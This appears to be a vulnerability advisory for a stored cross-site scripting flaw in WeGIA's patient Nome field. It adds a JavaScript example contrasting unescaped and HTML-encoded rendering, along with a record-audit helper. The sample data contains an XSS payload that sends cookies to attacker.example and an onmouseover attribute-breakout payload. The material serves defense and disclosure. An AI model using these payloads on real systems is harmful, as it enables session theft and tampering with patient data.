Impact
WeGIA is a web manager for charitable institutions that stores patient information. In versions before 3.6.10 the application accepts user input for the “Nome” (Name) field on the patient information page without proper sanitization. An authenticated user can therefore inject a JavaScript payload that is persisted in the database and executed automatically whenever the patient record is viewed by any other user. Because this is a stored cross-site scripting flaw, the injected script runs in the context of the viewing user's browser session, where it can tamper with patient data or exfiltrate sensitive information to the attacker.
Affected Systems
The flaw exists in all releases of WeGIA distributed by LabRedesCefetRJ that precede version 3.6.10. Any deployment that has not applied the 3.6.10 update remains vulnerable. Versions 3.6.10 and later contain the fix that removes the insecure input handling for the Nome field. Because the payload is persisted in the database, operators who upgrade should also review existing patient records for markup stored in the Nome field: a fix that only validates new input does not clean payloads written before the upgrade.
Risk and Exploitability
The CVSS score of 6.8 places this vulnerability in the Medium severity band. EPSS is not available at the present time, and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires a legitimate user account with permission to edit patient records; once a malicious payload is stored, it executes for every user who views the affected patient data, with no further interaction from the attacker. The attack surface is therefore limited to authenticated users with editing privileges, but the impact extends to every viewer of the record, including users with higher privileges than the attacker.
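The following is an added example, not code from WeGIA or from the advisory, that illustrates the flaw described in the Impact section and the exploitation path described above. It renders a patient row with the stored Nome value concatenated into HTML (the vulnerable pattern) beside a version that encodes the value for the HTML context it lands in (the equivalent of PHP's htmlspecialchars with ENT_QUOTES), and includes a small audit helper an operator could run over existing records. The record shape, the column layout, the function names and the sample payloads are assumptions for illustration.

```javascript
// Added example (not WeGIA code). Record shape and payloads are constructed.
const SAMPLE_PATIENTS = [
  { id: 1, nome: "Maria da Silva" },
  // Text-context payload: a script element stored in the Nome field.
  { id: 2, nome: "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>" },
  // Attribute-context payload: breaks out of a quoted attribute and adds a handler.
  { id: 3, nome: "\" onmouseover=\"alert(1)" },
];

// HTML entity encoding for text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the stored name goes straight into the markup,
// once inside an attribute value and once as element text.
function renderPatientVulnerable(p) {
  return `<tr><td>${p.id}</td><td title="${p.nome}">${p.nome}</td></tr>`;
}

// Hardened rendering: the same template, but every dynamic value is encoded.
function renderPatientSafe(p) {
  const nome = escapeHtml(p.nome);
  return `<tr><td>${p.id}</td><td title="${nome}">${nome}</td></tr>`;
}

// Attribute names of the first <td ...> tag, honouring double quotes, so an
// injected attribute can be told apart from the same text sitting inside a value.
function tdAttributeNames(html) {
  const tag = html.match(/<td\s([^>]*)>/);
  if (!tag) return [];
  const names = [];
  const attr = /([^\s="]+)(?:="([^"]*)")?/g;
  let m;
  while ((m = attr.exec(tag[1])) !== null) names.push(m[1]);
  return names;
}

// True if the rendered row contains a live script element or an event-handler
// attribute that the stored name managed to inject.
function isExploitable(html) {
  if (/<script\b/i.test(html)) return true;
  return tdAttributeNames(html).some((n) => /^on/i.test(n));
}

// Operator-side audit: ids of stored records whose Nome contains markup characters.
function auditStoredNames(patients) {
  return patients.filter((p) => /[<>"']/.test(p.nome)).map((p) => p.id);
}

for (const p of SAMPLE_PATIENTS) {
  console.log(p.id, "vulnerable:", isExploitable(renderPatientVulnerable(p)),
              "hardened:", isExploitable(renderPatientSafe(p)));
}
console.log("records to review:", auditStoredNames(SAMPLE_PATIENTS));
```

The encoding in escapeHtml is only correct for HTML text and double-quoted attribute values; a name that ends up inside a script block, an inline event handler or a URL needs the encoding for that context instead, and the audit helper flags records for review rather than proving them safe.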
OpenCVE Enrichment